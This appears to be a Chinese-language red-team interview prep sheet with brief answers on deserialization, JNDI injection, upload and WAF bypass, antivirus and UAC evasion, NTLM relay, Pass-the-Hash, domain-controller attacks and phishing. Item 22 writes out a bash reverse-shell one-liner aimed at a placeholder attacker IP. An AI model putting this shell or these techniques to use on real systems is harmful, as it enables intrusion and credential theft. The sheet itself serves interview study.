奇安信 2022 Zteam 面试(详细答案版)
1. Java反序列化攻击链
通过反序列化注入恶意类(如 gadget chain
),执行任意代码,依赖易受攻击的类库(如 commons-collections
或 fastjson
)。
2. JNDI、RMI、LDAP底层原理及本质漏洞
- 原理:利用JNDI服务从远程加载恶意类(RMI/LDAP接口返回恶意字节码)。
- 本质:反序列化漏洞或任意代码执行漏洞。
3. 上传绕过解析与跨目录攻击
- 跨目录:通过文件名构造
../../../../
绕过路径限制。 - 上传解析:伪装文件后缀,如
file.php.jpg
或file.html
,利用服务解析规则触发代码执行。
4. TP5绕过
- 文件包含:利用
include()
或动态路径组合实现任意文件读取。 - URL编码绕过:三次URL编码
%252525
绕过路径过滤规则。
5. Fastjson不出网绕过
- 使用
BaseDataSource
类的字节码注入绕过网络依赖。 - 自定义类加载或链式调用触发漏洞。
6. FRP/CS工具优化与免杀
- 通信优化:通过调整流量特征,如改变数据包大小或字符填充规则,避开检测。
7. Windows下Redis利用方式
- 写入绝对路径WebShell(如目标的
wwwroot
)。 - 利用Redis写入开机启动文件夹,添加恶意启动脚本。
8. 如何探测双网卡主机
通过 MAC
地址比对,多个网卡通常有多个 MAC
地址。
9. 最熟悉的渗透经历
举例:SQL注入发现后台弱口令 -> 文件上传获取WebShell -> 内网横向移动 -> 提权获取域控权限。
10. 钓鱼方法
- 使用
gophish
搭建钓鱼邮件。 LNK
文件(快捷方式)诱导用户点击,配合载荷执行。
11. 判断设备类型(Windows/Mac/Android)
通过 User-Agent
获取设备标识,如 Windows NT
、Macintosh
、Android
。
12. 绕过360执行命令
利用 dxcap.exe
调用底层函数执行命令。
13. 无密码如何渗透
暴力破解、利用默认配置、敏感信息泄露或中间人攻击。
14. 攻击域控
- 利用Kerberos委派攻击。
- Dump凭据(如NTLM Hash)。
15. 有/无Hash攻击域控
- 有Hash:Pass-the-Hash、NTLM中继。
- 无Hash:钓鱼凭据或利用漏洞如
Zerologon
。
16. 攻击VMware Center
- 未授权访问、弱口令暴力破解、任意文件读取漏洞利用。
17. Horizon攻击
- 利用任意文件读取或未授权漏洞。
18. Sphere攻击
- 针对API调用注入Payload,利用身份认证缺陷。
19. 绕过WAF文件上传攻击
- 修改文件签名、双扩展名、分块传输分包上传。
20. 文件上传中使用的函数
常见函数:move_uploaded_file()
、file_put_contents()
。
21. NTLM Relay攻击
劫持并中继目标凭据到其他系统(如SMB或LDAP),执行认证操作。
22. 反弹Shell
使用 bash -i >& /dev/tcp/attacker_ip/port 0>&1
或 nc
获取反向连接。
23. 代理流量
通过工具如 Burp Suite
、mitmproxy
实现中间人流量代理和分析。
24. 正向Shell
目标主动连接攻击者并提供Shell交互。
25. 端口转发
- 工具:
SSH -L/-R
或socat
实现内网转发到攻击端口。
26. 委派攻击
利用Kerberos协议的委派机制伪造服务票据(SPN)。
27. 数据库攻击方法
- MySQL:联合注入、加载文件。
- Redis:写入SSH公钥或绝对路径WebShell。
- SQLServer:
xp_cmdshell
执行系统命令。
28. MSSQL命令执行
使用 xp_cmdshell
或启用代理执行命令。
29. 绕过UAC
通过劫持注册表配置或利用 fodhelper.exe
等高权限程序执行命令。
30. 内网NTLM Relay钓鱼
- 使用
Responder
工具监听SMB或HTTP,劫持Hash进行中继认证。
31. 查看env敏感信息
通过暴露的API、备份文件或日志文件读取变量。
32. 内存马
将恶意代码注入Java或Tomcat等服务的内存中,常用工具如 Behinder
。
如果需要某一部分详细讲解,随时告知!